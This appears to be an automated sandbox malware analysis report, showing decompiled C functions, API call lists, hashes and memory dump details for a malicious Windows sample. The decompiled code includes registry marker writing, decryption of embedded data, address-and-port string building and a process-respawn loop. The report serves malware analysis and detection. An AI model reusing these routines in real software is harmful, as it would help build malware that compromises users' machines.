                                                                                                                                                                                                                                                                          0x04007a5a
                                                                                                                                                                                                                                                                          0x04007a6c
                                                                                                                                                                                                                                                                          0x04007a84
                                                                                                                                                                                                                                                                          0x04007a8f
                                                                                                                                                                                                                                                                          0x04007a90
                                                                                                                                                                                                                                                                          0x04007a95
                                                                                                                                                                                                                                                                          0x04007abc
                                                                                                                                                                                                                                                                          0x04007ac2
                                                                                                                                                                                                                                                                          0x04007acb
                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                          0x04007aef

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
                                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 04007A90
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 04007ABC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s:%u$Kobucgekyxca
                                                                                                                                                                                                                                                                          • API String ID: 1891311255-965644793
                                                                                                                                                                                                                                                                          • Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                          • Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005E30(signed char _a4) {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				signed int _v29;
                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                          				char* _t45;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_t31 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_v8 = _t31;
                                                                                                                                                                                                                                                                          				_t45 =  *0x4011894; // 0x4013fc4
                                                                                                                                                                                                                                                                          				_v24 = _t45;
                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                          					_v36 = 0x20;
                                                                                                                                                                                                                                                                          					_v28 = 0x20;
                                                                                                                                                                                                                                                                          					_v29 = 0;
                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                          						_v29 = 1;
                                                                                                                                                                                                                                                                          						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_v72 = 0x10;
                                                                                                                                                                                                                                                                          						E04009BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04005e36
                                                                                                                                                                                                                                                                          0x04005e3a
                                                                                                                                                                                                                                                                          0x04005e3f
                                                                                                                                                                                                                                                                          0x04005e42
                                                                                                                                                                                                                                                                          0x04005e48
                                                                                                                                                                                                                                                                          0x04005e4b
                                                                                                                                                                                                                                                                          0x04005e5b
                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                          0x04005e64
                                                                                                                                                                                                                                                                          0x04005e7e
                                                                                                                                                                                                                                                                          0x04005e86
                                                                                                                                                                                                                                                                          0x04005e8c
                                                                                                                                                                                                                                                                          0x04005e93
                                                                                                                                                                                                                                                                          0x04005e9a
                                                                                                                                                                                                                                                                          0x04005eb2
                                                                                                                                                                                                                                                                          0x04005eba
                                                                                                                                                                                                                                                                          0x04005ec2
                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                          0x04005edc
                                                                                                                                                                                                                                                                          0x04005ee2
                                                                                                                                                                                                                                                                          0x04005ee4
                                                                                                                                                                                                                                                                          0x04005ef1
                                                                                                                                                                                                                                                                          0x04005f0b
                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                          0x04005f25

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                          • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                          • Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E04004AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                          							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                          						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                          						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                          						_v16 = _t31;
                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                          						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						E040062B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                          						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                          						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04004ac9
                                                                                                                                                                                                                                                                          0x04004ad0
                                                                                                                                                                                                                                                                          0x04004ad8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                          0x04004ae5
                                                                                                                                                                                                                                                                          0x04004b80
                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                          0x04004b08
                                                                                                                                                                                                                                                                          0x04004b0e
                                                                                                                                                                                                                                                                          0x04004b15
                                                                                                                                                                                                                                                                          0x04004b32
                                                                                                                                                                                                                                                                          0x04004b37
                                                                                                                                                                                                                                                                          0x04004b3a
                                                                                                                                                                                                                                                                          0x04004b44
                                                                                                                                                                                                                                                                          0x04004b4e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b58
                                                                                                                                                                                                                                                                          0x04004b6b
                                                                                                                                                                                                                                                                          0x04004b78
                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                          0x04004b96
                                                                                                                                                                                                                                                                          0x04004b9b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004AD8
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004B78
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04004B85
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04004B90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                          • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                          • Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E040077B0(void** _a4) {
                                                                                                                                                                                                                                                                          				void** _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void** _v28;
                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          					_v12 = 0x96;
                                                                                                                                                                                                                                                                          					_v16 = 0x1388;
                                                                                                                                                                                                                                                                          					_v8 = _a4;
                                                                                                                                                                                                                                                                          					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                          							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                          							if(_t37 == 0) {
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                          									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                          									Sleep(0x7530);
                                                                                                                                                                                                                                                                          									_t40 = E04002070( *_v8);
                                                                                                                                                                                                                                                                          									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                          									_v8[3] = _t40;
                                                                                                                                                                                                                                                                          									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                          										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                          										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          											E04002510(_v8[3], 0x400e290);
                                                                                                                                                                                                                                                                          											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          									L11:
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                          						_v28 = _v8;
                                                                                                                                                                                                                                                                          						E040097C0(_v28);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x040077ba
                                                                                                                                                                                                                                                                          0x040077c2
                                                                                                                                                                                                                                                                          0x040077c8
                                                                                                                                                                                                                                                                          0x040077cf
                                                                                                                                                                                                                                                                          0x040077d9
                                                                                                                                                                                                                                                                          0x040077e2
                                                                                                                                                                                                                                                                          0x040077e8
                                                                                                                                                                                                                                                                          0x040077ef
                                                                                                                                                                                                                                                                          0x040077fc
                                                                                                                                                                                                                                                                          0x0400780e
                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                          0x04007818
                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                          0x04007835
                                                                                                                                                                                                                                                                          0x04007840
                                                                                                                                                                                                                                                                          0x0400784c
                                                                                                                                                                                                                                                                          0x04007851
                                                                                                                                                                                                                                                                          0x04007857
                                                                                                                                                                                                                                                                          0x04007861
                                                                                                                                                                                                                                                                          0x0400786d
                                                                                                                                                                                                                                                                          0x04007879
                                                                                                                                                                                                                                                                          0x04007887
                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007863
                                                                                                                                                                                                                                                                          0x04007821
                                                                                                                                                                                                                                                                          0x04007826
                                                                                                                                                                                                                                                                          0x0400788f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007893
                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                          0x040078a5
                                                                                                                                                                                                                                                                          0x040078ae
                                                                                                                                                                                                                                                                          0x040078b5
                                                                                                                                                                                                                                                                          0x040078ba
                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                          0x040078c8

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 040077C2
                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 0400780E
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04007826
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 04007835
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04007840
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040078BD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                          • Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                          • Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                          					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t29;
                                                                                                                                                                                                                                                                          					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                          						if(_v16 > 0) {
                                                                                                                                                                                                                                                                          							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          							_v20 = _t34;
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                          								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                          									_v8 = E040016F0(_v20, _v16);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x04005cd6
                                                                                                                                                                                                                                                                          0x04005ce1
                                                                                                                                                                                                                                                                          0x04005d10
                                                                                                                                                                                                                                                                          0x04005d16
                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                          0x04005d2f
                                                                                                                                                                                                                                                                          0x04005d36
                                                                                                                                                                                                                                                                          0x04005d45
                                                                                                                                                                                                                                                                          0x04005d4b
                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                          0x04005d54
                                                                                                                                                                                                                                                                          0x04005d6d
                                                                                                                                                                                                                                                                          0x04005d79
                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                          0x04005daf

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                          Memory Dump Source
